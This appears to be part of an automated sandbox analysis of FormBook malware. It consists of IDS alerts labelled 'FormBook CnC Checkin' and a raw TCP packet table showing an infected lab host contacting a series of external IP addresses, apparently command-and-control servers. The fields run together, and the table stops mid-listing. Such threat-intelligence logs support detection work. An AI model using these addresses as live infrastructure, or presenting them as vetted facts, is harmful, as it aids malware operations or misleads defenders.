                                                                                                                                              2024-10-04T08:08:16.370453+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049749194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:08:19.055237+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049750194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:08:21.799799+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049751194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:08:21.799799+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049751194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:08:27.522500+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975238.47.207.14680TCP
                                                                                                                                              2024-10-04T08:08:30.383804+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975338.47.207.14680TCP
                                                                                                                                              2024-10-04T08:08:33.206347+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975438.47.207.14680TCP
                                                                                                                                              2024-10-04T08:08:36.134022+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204975538.47.207.14680TCP
                                                                                                                                              2024-10-04T08:08:36.134022+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975538.47.207.14680TCP
                                                                                                                                              2024-10-04T08:08:42.464192+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497563.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:44.171973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497573.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:48.225224+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497583.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:49.455131+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497593.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:49.455131+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497593.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:54.961293+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:08:57.660518+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:00.343253+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049762162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:03.074744+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049763162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:03.074744+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049763162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:08.397666+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497643.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:11.025336+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497653.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:13.666700+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497663.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:16.303964+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497673.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:16.303964+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497673.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:21.628952+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497683.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:24.255747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497693.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:26.897559+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497703.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:36.586781+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497713.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:36.586781+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497713.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:42.768300+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:45.584421+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:48.428360+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:51.194765+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049775103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:51.194765+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049775103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:57.888410+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:00.688885+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049777133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:03.567159+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049778133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:06.308860+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049779133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:06.308860+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049779133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:11.751332+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049780137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:14.445249+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049781137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:17.133476+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049782137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:19.817346+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049783137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:19.817346+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049783137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:26.703408+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497843.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:27.929484+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497853.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:30.576243+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497863.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:34.124920+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497873.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:34.124920+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497873.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:08.503853+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978813.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:11.139810+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978913.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:16.421246+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204979113.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:16.421246+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979113.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:21.637551+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497923.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:24.291250+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497933.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:26.917056+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497943.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:29.558581+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497953.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:29.558581+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497953.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:35.698479+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497963.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:37.424219+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497973.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:40.971707+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497983.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:42.691844+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497993.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:42.691844+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497993.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:55.831625+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204980384.32.84.3280TCP
                                                                                                                                              2024-10-04T08:11:55.831625+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980384.32.84.3280TCP
                                                                                                                                              2024-10-04T08:12:01.158312+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980454.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:03.843560+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980554.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:06.530851+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980654.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:09.217163+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204980754.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:09.217163+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980754.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:14.710122+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:17.456583+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:20.227339+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049810194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:22.981412+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049811194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:22.981412+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049811194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:28.589435+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981238.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:31.424116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981338.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:34.257482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981438.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:37.094000+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204981538.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:37.094000+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981538.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:42.323419+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498163.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:44.963088+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498173.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:47.605353+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498183.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:50.239495+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498193.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:50.239495+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498193.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:55.602099+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049820162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:12:58.275186+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049821162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:13:00.993932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049822162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:13:03.685558+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049823162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:13:03.685558+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049823162.213.249.21680TCP

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 4, 2024 08:06:04.328871012 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.520726919 CEST8049727185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:04.520934105 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.521403074 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.713197947 CEST8049727185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:04.714046955 CEST8049727185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:04.714236975 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.716013908 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.716046095 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:04.716202021 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.727313042 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:04.727327108 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.131109953 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.131453991 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.172055006 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.172069073 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.172333002 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.172476053 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.174913883 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.216176987 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.517573118 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.517714024 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.517738104 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.517832041 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.517864943 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.518026114 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.713100910 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.713177919 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.713270903 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.713375092 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.713381052 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.713428020 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.713622093 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.713629007 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.713725090 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.713947058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.752048016 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.752307892 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.909409046 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.909583092 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.909823895 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.910140991 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.910320997 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.910475969 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.910667896 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.910826921 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.910826921 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.910891056 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.910934925 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.911176920 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.911431074 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.911669016 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.911832094 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.912060976 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948141098 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.948415041 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948726892 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.949109077 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.107809067 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.107980013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.108064890 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.108563900 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.108844042 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.109281063 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.109539032 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.110040903 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.110390902 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.110745907 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.111145973 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.111569881 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.111846924 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.111907005 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112356901 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.112545013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112545013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112605095 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112885952 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.113185883 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.113671064 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.113889933 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.114034891 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.114182949 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.114368916 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.114414930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.145313025 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.145668030 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.145858049 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.146076918 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.146245956 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.146615028 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.146817923 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.146986961 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.147279024 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.147480965 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.147533894 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.310595989 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.310853958 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.310924053 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311388969 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.311538935 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311538935 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311609030 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311702013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.312096119 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.312340975 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.312860966 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.313030005 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313169956 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313585043 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.313782930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313782930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313782930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313956022 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314421892 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.314614058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314614058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314615011 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314615011 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314685106 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315148115 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.315310955 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315311909 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315421104 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315871000 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.316348076 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316348076 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316740990 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.316881895 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316881895 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316941977 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.317073107 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.317447901 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.317712069 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.317769051 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.317867041 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.318080902 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.368164062 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.368226051 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:14.723680973 CEST8049727185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:14.723895073 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:27.123589039 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:37.612637997 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:38.613061905 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:40.628281116 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:44.643016100 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:52.656934977 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:07:03.808011055 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:03.912611961 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:03.912884951 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:03.920676947 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:04.021939993 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:04.025481939 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:04.025567055 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:04.025800943 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:04.028363943 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:04.129407883 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:19.252701998 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:19.353580952 CEST80497323.33.130.190192.168.11.20
